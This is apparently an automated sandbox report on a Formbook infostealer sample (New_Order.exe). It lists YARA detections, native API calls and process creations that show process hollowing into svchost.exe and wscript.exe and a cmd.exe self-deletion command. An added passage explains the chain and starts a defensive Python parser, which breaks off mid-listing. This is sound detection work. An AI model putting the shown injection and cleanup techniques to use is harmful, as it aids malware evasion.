          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: New_Order.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418270 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004182F0 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004181BA NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004182EA NtClose,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006281C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00628270 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006282F0 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006283A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006281BA NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_006282EA NtClose,
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00406945
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040711C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041BA5D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041C34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00408C60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041B4A3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EBB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E03DA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EDBD2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2B28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0394AB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F22AE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DFA2B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392F900
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393B090
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F20A8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F28EC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E1002
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FE824
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FDFCE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F1FF1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2EF7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ED616
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03946E30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F25DD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F2D07
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03920D20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F1D55
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393841F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ED466
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487B090
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049320A8
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04921002
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487841F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0486F900
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932D07
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04860D20
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04931D55
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_049322AE
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932EF7
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04886E30
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0489EBB0
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04931FF1
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_04932B28
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062BA5D
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062C34C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00618C60
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_0062B4A3
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00612D90
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_00612FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B150 appears 48 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0486B150 appears 35 times
          Source: New_Order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
          Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs New_Order.exe
          Source: New_Order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@13/8
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\Users\user\Desktop\New_Order.exe | File created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmp
          Source: New_Order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New_Order.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\New_Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: New_Order.exe | Virustotal: Detection: 38%
          Source: New_Order.exe | ReversingLabs: Detection: 59%
          Source: C:\Users\user\Desktop\New_Order.exe | File read: C:\Users\user\Desktop\New_Order.exe
          Source: unknown | Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Users\user\Desktop\New_Order.exe | Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New_Order.exe | Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
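The process-creation lines above, read together with the Nt* "Code function" listing for svchost.exe and wscript.exe earlier in this section, describe the whole chain: the dropper starts a SysWOW64 svchost.exe but hands it its own path as the command line (the hollowed child runs the sample's code under a system image name), the payload then surfaces in a wscript.exe whose parent is explorer.exe, and that wscript.exe deletes the svchost.exe copy through cmd.exe. The following is an added example, not code from the report or from Joe Sandbox, that turns such lines into a parent-to-child tree and a per-process set of native calls, then emits the findings a hunter would act on. The sample lines are copied from this report with a " | " separating the source cell from the event cell (an assumption about how the table was flattened); the grouping of native calls as injection primitives and the threshold of four are my choices, not the report's.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from this report.
REPORT_LINES = [
    r"Source: unknown | Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'",
    r"Source: C:\Users\user\Desktop\New_Order.exe | Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'",
    r"Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039698A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969950 NtQueueApcThread,",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AD30 NtSetContextThread,",
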